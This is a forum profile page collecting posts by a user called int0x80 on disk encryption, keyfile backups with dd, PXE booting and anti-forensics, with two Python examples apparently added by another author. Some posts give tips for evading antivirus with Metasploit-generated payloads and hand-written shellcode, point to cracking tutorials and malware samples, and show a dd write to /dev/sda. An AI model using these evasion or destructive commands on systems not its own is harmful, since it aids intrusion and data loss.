Posts posted by int0x80
-
I installed Kubuntu 14.04 into a new VM and selected the full system encryption with LVM option during install. After dropping out to BusyBox, I do have cryptsetup available:
(initramfs) which cryptsetup
/sbin/cryptsetup
My guess is that you are using cryptsetup in the live environment that you booted from, but it is not installed into the host OS (your persistent installation). HTH.
-
One good rez deserves another. Mods please forgive me.
Replies inline:
What happens if i lose the usb key or it stops working ? Do i need to back this key up somehow and if so what is the best way.
Definitely back up the drive. I do this with dd -- let's say the USB drive is /dev/sdd in this example:
dd if=/dev/sdd bs=64k of=./boot_usb.img
Should something change like losing your USB drive, physical media degradation, or you just want to switch up your media (and use an SD card, for example); you can write the new device from the acquired image -- let's say the new device is /dev/sde in this example:
dd if=./boot_usb.img bs=64k of=/dev/sde
Now all the bytes are the same and you're good to go.
If you are deriving the key each time, then can anyone do it if they had access to that key, or would they need to know the offset, which could be computed in no time I am assuming? Especially if, like in the example, choosing 32 which is near the beginning?
The key needs to be exactly the same in order to decrypt the drive. An attacker would need to know your exact key derivation algorithm to recreate the key. The approach of choosing your own method gives you flexibility here, aka pick your poison: consecutive bytes, every other byte, every third byte, offsets in the Fibonacci sequence, whatever you want. Choose your own adventure -- you just have to do it the same way each time to always recreate the same key.
Keep your operational security (opsec) in mind. Who are your adversaries? Are you worried that BART police might snatch your laptop, for example? Then don't sit under a camera on BART with your keyboard and screen exposed while you decrypt your laptop. You get the idea.
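As an added example (my code, not int0x80's scripts), here is one way to make the "same bytes, same offsets, same key" rule concrete and to check a dd image against the original stick before trusting it. It assumes the key is read from a raw device or image such as the boot_usb.img above; the offset schemes, the default start offset of 32 and the 64-byte key length are assumptions, not something the posts specify.

```python
import hashlib
import io

KEY_LEN = 64  # assumed key length in bytes; pick your own, but never change it


def offsets(scheme, start, count):
    """Byte offsets for a chosen derivation scheme (the 'pick your poison' step).

    The same scheme, start and count must be used every time, or the key
    that comes out will not be the one the volume was encrypted with.
    """
    if scheme == "consecutive":
        return [start + i for i in range(count)]
    if scheme.startswith("every_"):           # every_2, every_3, ...
        step = int(scheme.split("_", 1)[1])
        return [start + i * step for i in range(count)]
    if scheme == "fibonacci":                 # start+1, +2, +3, +5, +8, ...
        out, a, b = [], 1, 2
        while len(out) < count:
            out.append(start + a)
            a, b = b, a + b
        return out
    raise ValueError("unknown scheme: %s" % scheme)


def derive_key(fh, scheme, start=32, count=KEY_LEN):
    """Read the key bytes from an open device or image file at the scheme's
    offsets. Raises instead of quietly returning a short key when the scheme
    runs past the end of the media (e.g. a restore onto a smaller stick)."""
    key = bytearray()
    for off in offsets(scheme, start, count):
        fh.seek(off)
        b = fh.read(1)
        if not b:
            raise ValueError("offset %d is past the end of the media" % off)
        key += b
    return bytes(key)


def derive_key_from_bytes(data, scheme, start=32, count=KEY_LEN):
    return derive_key(io.BytesIO(data), scheme, start, count)


def same_key(path_a, path_b, scheme, start=32, count=KEY_LEN):
    """True if the device and its dd image yield an identical key. Only
    digests are compared, so the key bytes never have to be shown or logged."""
    with open(path_a, "rb") as fa, open(path_b, "rb") as fb:
        da = hashlib.sha256(derive_key(fa, scheme, start, count)).digest()
        db = hashlib.sha256(derive_key(fb, scheme, start, count)).digest()
    return da == db
```

Run same_key("/dev/sdd", "./boot_usb.img", "every_3") right after the dd backup, and again after writing the image to a new device, before you depend on the copy.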
-
I recommend learning to crack software, it's a fun challenge. Here is a good starting point: http://tuts4you.com/download.php?list.17
Keep us updated on your progress. People are more likely to help when you post specific questions showing effort on your part.
-
There are some interesting ideas in the paper "How to Exit the Matrix". I've seen the paper mirrored at different places so just google if you can't find it. At the time of this post, the paper is currently at http://billstclair.com/matrix/
-
You can also grab samples from http://www.malwaredomainlist.com/mdl.php
Also I heard that Offensive Computing will be returning, but run by a different group of people at http://openmalware.org/
-
Actually I've had good success bypassing AV with metasploit. Shellcode isn't too hard. Have you played with the nasm shell in metasploit? Another easy way for messing with shellcode is to just load a regular program in OllyDbg, scroll down to the NULLs at the end of the section, hit space, and start typing your assembly. The debugger will display the op codes in the column to the left of the instructions.
-
I usually use msfpayload and msfencode with -t exe for kicking out payloads in PE form.
You can also do -f exe with msfvenom, iirc (don't have my bt5 vm up at the moment).
-
Try this:
-
I'm surprised there is internet run to Paper St. You're alone for half a mile in every direction, and you have to shut off the power when it rains ;)
-
DBAN over PXE to wipe. If you're going to encrypt, you want a layer of random bytes as your last write to the drive before the encryption.
-
Are you also using Gandi.net for hosting? I too left GoDaddy because of SOPA and went over to domain.com since Hak5 promotes it. I've noticed that your website is super fast, as is Gandi.net, compared to other websites where I live. However, my website and domain.com load rather slowly in my part of the world.
Nice, and thanks! My hosting is on a server I colo. Just the DNS and SSL certs are through Gandi.
-
When you have your info public you may get some physical junk mail.
Other than that I went back to public listing to save me some money.
There's that. Also your affiliation with the client may (read: will probably) show up when someone pulls a credit report. IMO, my employer, landlord, bank, et al do not need to know with whom I do business.
If you have to pay extra for it, move to another host. Dreamhost offers private DNS for free as part of the domain name and most domain names are only $9.99/year. That's for default .com, .org, .net, etc. Exotic domain name TLDs, however, cost a bit more due to country fees. I never heard of a registrar charging for it though. It should be default on most registrars. By default you should be able to even change any aspect of your Whois info. Even GoDaddy (who I would not recommend to anyone) lets you manually edit your Whois info.
Another fun aspect of GoDaddy is that GoDaddy will fine you if someone complains about your fake/inaccurate whois info.
My current registrar is Gandi.net and they have been great; whois privacy is included wrt this thread. I left GoDaddy in a SOPA-induced rage and haven't looked back. Of particular endearment to me was Gandi's No BS policy: https://www.gandi.net/no-bullshit
-
Never heard of that. Got any evidence or documentation?
-
Are you ok with having that information published on the internet?
-
Look into screen or tmux. I have this alias in my ~/.bash_aliases for when I connect and want to re-attach:
alias screenr="screen -raAd"
-
What's your bag? Give people some contextual clues on your interests and experience.
Personally, I'd say get your 2 quid back and get a USB drive :]
-
When I come back into the country, I generally rsync/ssh my data onto a server state-side, then zero the drive on the laptop. That way there is no confusion regarding disk contents.
For good measure I give it a little:
echo -n "Just us zeroes :]" | dd of=/dev/sda seek=$RANDOM
Reference (NSFW) http://pt.reddit.com/r/AskReddit/comments/ndpe1/whats_your_best_it_was_the_most_inappropriate/c38bptk
-
I have to run Windows on a few boxes (one of them an always-on server) and am looking for some anti-forensics ideas similar to what int0x80 discussed in his talk at the Louise and his bash scripts on Github. Right now I've got CCleaner, Bleachbit, Clean After Me, and USB Oblivion kicking off as scheduled tasks. Each one runs 6 hours after the other. I've also got BCWipe v5 running Transparent Wiping (any user or system delete calls go through its driver, and receive a one-pass pseudo-random wipe) and an encrypted swap. I'd love to get a few more ideas from any Windows users... especially for attacking unknown USB devices and generating thousands of dummy files of varying sizes (encrypted).
Thanks.
I haven't done much Windows anti-forensics research, in fact, you've given me some things to look up. One option you could consider is porting my scripts over and running them via cygwin or gnuwin32. If you've got FDE and you're running these wipes in cycles, you should be pretty well set. I haven't seen any Windows stuff that attacks inserted USB devices, but it would be a surprise if such software didn't already exist. Sorry to not be of much help on this one.
-
I generally like http://hardforum.com when I spec a new system. There is a ton to know about hardware, if you're interested. Here is a good link to get started http://hardforum.com/showthread.php?t=1352290
The people there are also mostly helpful, so when you think you have a system shopped out, post a thread as per their FAQ and wait for feedback. Forum members often find better deals on the hardware you want or even better hardware at lower prices.
-
Very cool! I hadn't thought of doing Spinrite, well played :)
-
-
I think the point is to get vbox to direct the guest vm over to the proper destination for pxe. Like vmware, vbox should have its own dhcp setup, so it just needs to be configured properly to get the new guest vm over to the pxe server guest vm. I have a new handle of sj.
-
So after loading up a different VM in VirtualBox with something already on it (CentOS) I confirmed that DHCP is running fine as it took an address out of a pool of two. But I still can't get it to boot up PXE first... it always fails! It reads 'no boot filename received'
I'm running out of jd and coke tryin to fix these mundane problems!
Just googling around and found a few items:
1. Is the guest vm network adapter connected at power on?
2. Is there a boot filename option specified in the dhcp configuration?
3. Has anyone really been far even as decided to use even go want to do look more like?
You can help me finish off this sailor jerrys if you run out of jack.
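Item 2 is the one that matches the 'no boot filename received' message, so here is an added example (mine, not from the thread) that parses a DHCPOFFER and reports what a PXE client would actually get: the bootfile from option 67 or the fixed 'file' header field, and the next-server from option 66 or siaddr. The packet builder is constructed test data standing in for a capture from the VirtualBox network; the addresses in it are made up.

```python
import socket
import struct

MAGIC = b"\x63\x82\x53\x63"                      # DHCP magic cookie
HDR = "!BBBBIHH4s4s4s4s16s64s128s"               # fixed 236-byte BOOTP header


def build_offer(yiaddr, siaddr, bootfile=None, as_option=True):
    """Construct a minimal DHCPOFFER (constructed data, not a real capture).
    bootfile=None mimics a server that leases an address but never says what
    to boot, which is what the 'no boot filename received' client saw."""
    legacy = b"" if (bootfile is None or as_option) else bootfile.encode()
    hdr = struct.pack(HDR, 2, 1, 6, 0, 0x1234, 0, 0x8000,
                      b"\0" * 4, socket.inet_aton(yiaddr), socket.inet_aton(siaddr),
                      b"\0" * 4, b"\0" * 16, b"\0" * 64, legacy)
    opts = b"\x35\x01\x02"                       # option 53: DHCPOFFER
    if bootfile is not None and as_option:
        bf = bootfile.encode()
        opts += b"\x43" + bytes([len(bf)]) + bf  # option 67: bootfile name
    return hdr + MAGIC + opts + b"\xff"


def parse_dhcp(pkt):
    """Decode the header and walk the TLV options up to the end marker."""
    f = struct.unpack(HDR, pkt[:236])
    if pkt[236:240] != MAGIC:
        raise ValueError("not a DHCP packet (bad magic cookie)")
    opts, i = {}, 240
    while i < len(pkt) and pkt[i] != 0xFF:
        if pkt[i] == 0:                          # pad option, no length byte
            i += 1
            continue
        code, ln = pkt[i], pkt[i + 1]
        opts[code] = pkt[i + 2:i + 2 + ln]
        i += 2 + ln
    return {"type": opts.get(53, b"\0")[0],
            "yiaddr": socket.inet_ntoa(f[8]), "siaddr": socket.inet_ntoa(f[9]),
            "file": f[13].split(b"\0", 1)[0].decode(errors="replace"),
            "options": opts}


def pxe_boot_info(pkt):
    """(next-server, bootfile) a PXE client would use, or None when the offer
    carries no boot filename at all: the DHCP side of item 2 above."""
    d = parse_dhcp(pkt)
    name = d["options"].get(67, b"").decode(errors="replace") or d["file"]
    if not name:
        return None
    server = d["options"].get(66, b"").decode(errors="replace") or d["siaddr"]
    return server, name
```

Feed it the raw UDP payload of the offer captured on the guest network and you can tell whether the DHCP server or the PXE ROM is the one at fault.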
-
Very cool! Encrypted volume was not an idea I had considered. That's awesome :D
Today has been a long day and I still have lots to do, so give me some time to look through the code in the next few days and then I can adequately contribute to the thread :]
Ep 1102 Install Using Btr5 R2 (in Hak5)
You should be able to, definitely give that a try.
Another more-involved option could be to add cryptsetup into your initrd, but I would go for installing cryptsetup into the target install during the setup process.
Please post your notes/instructions here once you get it figured out. Other people are sure to have the same questions as you.